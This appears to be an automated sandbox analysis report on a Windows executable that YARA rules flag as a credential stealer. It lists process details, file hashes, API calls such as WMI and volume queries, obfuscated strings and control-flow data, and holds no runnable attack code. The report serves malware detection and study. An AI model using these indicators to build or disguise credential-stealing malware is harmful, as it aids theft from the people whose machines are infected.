                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f82dfbcc325-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1578&rtt_var=606&sent=302&recv=592&lost=0&retrans=0&sent_bytes=2835&recv_bytes=570883&delivery_rate=1783750&cwnd=252&unsent_bytes=0&cid=03d7410ae4f46154&ts=2335&x=0"


                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:03:29:34
                                                                                                                                                                                                                                                              Start date:28/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\hx0wBsOjkQ.exe"
                                                                                                                                                                                                                                                              Imagebase:0x3e0000
                                                                                                                                                                                                                                                              File size:1'810'944 bytes
                                                                                                                                                                                                                                                              MD5 hash:E58E6E26D4FF748BD8E7F718372F8351
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1624031849.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599366163.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1626918311.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599230927.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true


                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:71.6%
                                                                                                                                                                                                                                                                Total number of Nodes:264
                                                                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                                                                                                                • Opcode ID: 8f9fcf459ffd2656526da12d4d619a9dfdb46712d58549fdbe0951dc62194777
                                                                                                                                                                                                                                                                • Instruction ID: 56dc7169d005fbf208a8cef28bd1a549cf892dec2d51ceedafc84c6079c5746c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9fcf459ffd2656526da12d4d619a9dfdb46712d58549fdbe0951dc62194777
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21C226B1608350CFD7258F28D8927ABB7E6FF95314F59893CE5C98B292D7349806CB42

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                                                                                                                • Opcode ID: 8f1af34a32bdde97f1636fe5a03d8a3a4359b925c81fef81caeb955bbf5badea
                                                                                                                                                                                                                                                                • Instruction ID: f0e97086cb8101f3b482ec4fdba3ed5e1848b14be1a0975d93c8a2bddb12b9c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f1af34a32bdde97f1636fe5a03d8a3a4359b925c81fef81caeb955bbf5badea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD22BE7050C7808FD3248B28C58436FBBE1AB86314F18496EE9D9973D2D3BD8846CB4B

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 00419550
                                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0041958E
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 004198DF
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004198E5
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0041992E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                                • Opcode ID: a56619464f2f0a5559f399bb9297f8d5da5f8e6bcf96b9177cb9c41d9aca8a62
                                                                                                                                                                                                                                                                • Instruction ID: 248ac51da24458fa8f9de833c7a0c9e7f0f4b74171018b7b455a7edaafc4c61c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a56619464f2f0a5559f399bb9297f8d5da5f8e6bcf96b9177cb9c41d9aca8a62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB223372A183419BD310CF24C891B9BBBE2EFC5314F28892DE9D49B391D779D845CB86

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                                • API String ID: 0-620192811
                                                                                                                                                                                                                                                                • Opcode ID: eb41bbe8d0230cd015209c9f16a817043c7e27e0231006e4eb593d60d03ab4e0
                                                                                                                                                                                                                                                                • Instruction ID: c44e7e720a2ab27192ce645b98cf2da40d041b254df1e2c8591796694ae6126c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb41bbe8d0230cd015209c9f16a817043c7e27e0231006e4eb593d60d03ab4e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A0263B0200B41DFD335CF26D891BABBBE1FB49314F408A2CD4AA8BAA0D774A455CF54

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 003F1EC3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                                                                                                                                                                                • API String ID: 237503144-3949209405
                                                                                                                                                                                                                                                                • Opcode ID: b9d854ff498366573d207222805ac2756b5bf76a1fe7990ab2e42ec3dcf865d9
                                                                                                                                                                                                                                                                • Instruction ID: 7bc9e96acb08b57aef798a79b6d860ac1cf9c64e7c087b56eddc20f486211372
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d854ff498366573d207222805ac2756b5bf76a1fe7990ab2e42ec3dcf865d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED129F7560C794CBC3669B38C4913AFBBE1AF85320F194A2EE5D9873C2D63888459B43

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                                • API String ID: 0-4163809010
                                                                                                                                                                                                                                                                • Opcode ID: 6f285a051fd68880fadedf47e28939981ca8da004b7bb1aa4e7428a3de6de113
                                                                                                                                                                                                                                                                • Instruction ID: 901215d98606e451eecfa9c09a406b319efdad3165cf1d0c43f05530b787c7c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f285a051fd68880fadedf47e28939981ca8da004b7bb1aa4e7428a3de6de113
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C52BF7260C794CBC725DB38D4943AFBBE1AB95320F198A2EE5D9C73C2D67489418B43

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                                • API String ID: 0-1108506012

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 003E8A4B
                                                                                                                                                                                                                                                                  • Part of subcall function 003EB7B0: FreeLibrary.KERNEL32(003E8A31), ref: 003EB7B6
                                                                                                                                                                                                                                                                  • Part of subcall function 003EB7B0: FreeLibrary.KERNEL32 ref: 003EB7D7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                                                                                                                • API String ID: 1614911148-2900034282

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0040D3EE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                                • String ID: ><+
                                                                                                                                                                                                                                                                • API String ID: 3960555810-2918635699

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 1177 40d17d-40d1c5 call 3e7fd0 call 41fe00 EnumDisplaySettingsW call 3faeb0 1183 40d1ca-40d1fb 1177->1183 1184 40d200-40d21b 1183->1184 1184->1184 1185 40d21d-40d222 1184->1185 1186 40d224-40d225 1185->1186 1187 40d23b-40d243 1185->1187 1188 40d230-40d239 1186->1188 1189 40d245-40d249 1187->1189 1190 40d25d 1187->1190 1188->1187 1188->1188 1191 40d250-40d259 1189->1191 1192 40d260-40d287 call 3faeb0 1190->1192 1191->1191 1193 40d25b 1191->1193 1196 40d289-40d28f 1192->1196 1197 40d29d 1192->1197 1193->1192 1198 40d290-40d299 1196->1198 1199 40d2a0-40d2cf FreeLibrary 1197->1199 1198->1198 1201 40d29b 1198->1201 1202 40d2d0-40d2e2 1199->1202 1201->1199 1202->1202 1203 40d2e4-40d31a call 3e8f70 1202->1203
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 0040D1B3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 0040D2A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DisplayEnumFreeLibrarySettings
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1449841772-0
                                                                                                                                                                                                                                                                • Opcode ID: 33add3d6d316ae96631ae755975a7852ba4fc0153c473f178247435b51ac5999
                                                                                                                                                                                                                                                                • Instruction ID: de72d44266cf2949b631b010904c0d7eb344119e6759f8300c4b48845c88bb36
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33add3d6d316ae96631ae755975a7852ba4fc0153c473f178247435b51ac5999
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A41E1706043818BE3158B38C9A0B63BFE1EF57314F28869CE5DA5F393D639980A8B55
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: @Ukx$
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                                • Opcode ID: 7770d2e7efcdffea95f03bb6da294060e501c5864ac5de6770c1f7fd922e52ac
                                                                                                                                                                                                                                                                • Instruction ID: 3657538467034911ebf0da031acb498006ea0579f34fe97e78aa8df8c4394f89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7770d2e7efcdffea95f03bb6da294060e501c5864ac5de6770c1f7fd922e52ac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9B16632B083204BC728CE28ECD12BBB7D3EBD5314F59893DD98657396CA399C458786
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 5DABC8580B7AE972BEBA0C6A975F1733
                                                                                                                                                                                                                                                                • API String ID: 0-2157045354
                                                                                                                                                                                                                                                                • Opcode ID: 363a0194c9f559d2999ef94d458b0d6219b6658f77b4b14ad2a27fd858ff2d75
                                                                                                                                                                                                                                                                • Instruction ID: 5e2407b02aa91971aa347d5ac627600344b68b5098b420faedc35226278623be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 363a0194c9f559d2999ef94d458b0d6219b6658f77b4b14ad2a27fd858ff2d75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00817D756407418BD325CB39CC927A7B7E2FF9A315F0DCA6CD4868B387E678A8028750
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0042148A,00000002,00000018,?,?,00000018,?,?,?), ref: 0041E13E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                • Opcode ID: 92257ca6012847125e0ada6d62c328d857c202bdbee1f18d55e63a9f9db457d8
                                                                                                                                                                                                                                                                • Instruction ID: 7d7f5d0cb539cd7b7760c297e12ca9a135aa8be3c67dffdc054a5cfe0befa648
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92257ca6012847125e0ada6d62c328d857c202bdbee1f18d55e63a9f9db457d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37712BB1E083005BD7249B29DC9277B76A1DF81314F18853DE986A73C2E23DEC06835B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: =<32
                                                                                                                                                                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                                • Opcode ID: cde7fe5e413febb926b67627a59d2e96dd3d090adfcae7440c3bce4cdb8d4326
                                                                                                                                                                                                                                                                • Instruction ID: 74c6d365781ec40f4ef800d090104f3d7b76d27af9b370a74f6a5ce85e3ccc98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde7fe5e413febb926b67627a59d2e96dd3d090adfcae7440c3bce4cdb8d4326
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 773168387043146BE724AE14ACD1B3BB396EBD4350F58852EE981573B0D739DC51878A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,-
                                                                                                                                                                                                                                                                • API String ID: 0-1027024164
                                                                                                                                                                                                                                                                • Opcode ID: 7a4140848d33ec0c66c937f08661c772cc61a402755d5ad827e3fd3009954760
                                                                                                                                                                                                                                                                • Instruction ID: 853ec9298601950d320b66fe70d2ae791381d07f401d9abb64190c857c8d86fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4140848d33ec0c66c937f08661c772cc61a402755d5ad827e3fd3009954760
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F2128A1A153008BC7149F29CC52527B7B1EF82365F458629F4869B3A1F7788D05CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 426d8e085acdbfdf34e08a488eca5c7b0b51ab18019563ed16b228a4192a02db
                                                                                                                                                                                                                                                                • Instruction ID: 803dc71210510a0967e63136f713fac6db8df398c5f066c67d8b3b77b28d3e7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 426d8e085acdbfdf34e08a488eca5c7b0b51ab18019563ed16b228a4192a02db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD3101716083048BC314DF58E8C266FBBE4EBC5364F54893DEA9883391D739D848CB9A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: d065752c6042cb11fb3c62e8a1918ab874b88cc3118cd5a882a217dddd4e405d
                                                                                                                                                                                                                                                                • Instruction ID: fa62e72709a6c42423123368e36c02e5126187060d5976f5c8ba85c5b7f3712b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d065752c6042cb11fb3c62e8a1918ab874b88cc3118cd5a882a217dddd4e405d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C06116357043119BD714AF18D89062FB7E2EFC5710F59852EE98587392EB34DCA1C78A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: e7c2f92206059179efab385a397b42f52003f86d8d4e6dd01d3fc4dfd0f32cba
                                                                                                                                                                                                                                                                • Instruction ID: 319856988dd1a57a29795d5bc9e43cb07c95d3261c2aed006f31558638fa2d4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7c2f92206059179efab385a397b42f52003f86d8d4e6dd01d3fc4dfd0f32cba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68517875A483054BD728AF28CC8067FB7D2ABD5310F18893EE4D597391E7359C828B8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e32d949b3c10a750230b3f4e81b58b8ae8dca7ef725f37d2ae713ba6cc84dfd
                                                                                                                                                                                                                                                                • Instruction ID: d4e1da43e52a36c6dadafef708c3a79a0a716e685fa308b6061a69d0051dc7ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e32d949b3c10a750230b3f4e81b58b8ae8dca7ef725f37d2ae713ba6cc84dfd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19310DEAF0029457E9167B232C53A7F21574BD0718F08113DF50B2A3C3ED69F916969B
Memory Dump Source
• Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmp

Control-flow Graph
